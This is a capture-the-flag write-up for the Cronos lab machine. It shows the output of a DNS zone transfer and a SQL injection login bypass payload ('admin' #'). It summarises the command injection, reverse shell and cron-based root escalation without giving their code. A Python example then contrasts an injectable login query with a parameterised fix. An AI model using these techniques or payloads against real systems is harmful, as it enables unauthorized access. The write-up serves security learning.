We perform a zone transfer using dig and find a virtual host for the admin page, which is vulnerable to SQL injection.
Once logged in, we send the request through Burp and get command execution from a tool that performs ping and traceroute, then a reverse shell using Python.
We notice that root executes a PHP script every minute and that the script is owned by our user, www-data. Replacing the PHP script with our own code gives us root.
# dig cronos.htb @10.10.10.13

; <<>> DiG 9.11.16-2-Debian <<>> cronos.htb @10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12057
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.                    IN      A

;; ANSWER SECTION:
cronos.htb.             604800  IN      A       10.10.10.13

;; AUTHORITY SECTION:
cronos.htb.             604800  IN      NS      ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 55 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 14 22:25:48 EDT 2020
;; MSG SIZE  rcvd: 89
Zone transfer
# dig axfr cronos.htb @10.10.10.13

; <<>> DiG 9.11.16-2-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 56 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 14 22:30:14 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)

The interesting record here is admin.cronos.htb.
HTTP
On the admin page, we tried guessing a few usernames and passwords but got nothing. However, when we tried a few SQL injection payloads, we were able to log in using the following:
Username: admin' #
Password: admin
Once logged in, we are redirected to a tool that allows us to ping and traceroute hosts.
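As an added illustration of why a username like admin' # gets past the login and how to close the hole (example code, not from the box or this writeup): a login that splices the username into the SQL text, beside a parameterised version of the same check. The users table, its columns and the sample credential are constructed; SQLite is used so it runs offline, and since SQLite only recognises -- as a comment marker where MySQL also accepts #, the payload below uses that form.

```python
import hashlib
import hmac
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the admin login table (assumed names).
    # SHA-256 keeps the example short; a real deployment would use a salted,
    # slow password hash.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_sha256 TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("admin", hashlib.sha256(b"correct horse").hexdigest()),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The pattern the writeup bypasses: user input pasted into the SQL text.
    # A quote in the username closes the string literal and a comment marker
    # discards the rest of the statement, including the password check.
    digest = hashlib.sha256(password.encode()).hexdigest()
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND pw_sha256 = '" + digest + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the username is bound as data, so quotes and
    # comment markers never reach the SQL parser. The hash comparison happens
    # in the application, in constant time.
    row = conn.execute(
        "SELECT pw_sha256 FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    digest = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(row[0], digest)


if __name__ == "__main__":
    db = build_db()
    payload = "admin' -- "  # SQLite form of the writeup's admin' # payload
    print("vulnerable, injected username:", login_vulnerable(db, payload, "wrong"))
    print("parameterised, injected username:", login_safe(db, payload, "wrong"))
    print("parameterised, real credentials:", login_safe(db, "admin", "correct horse"))
```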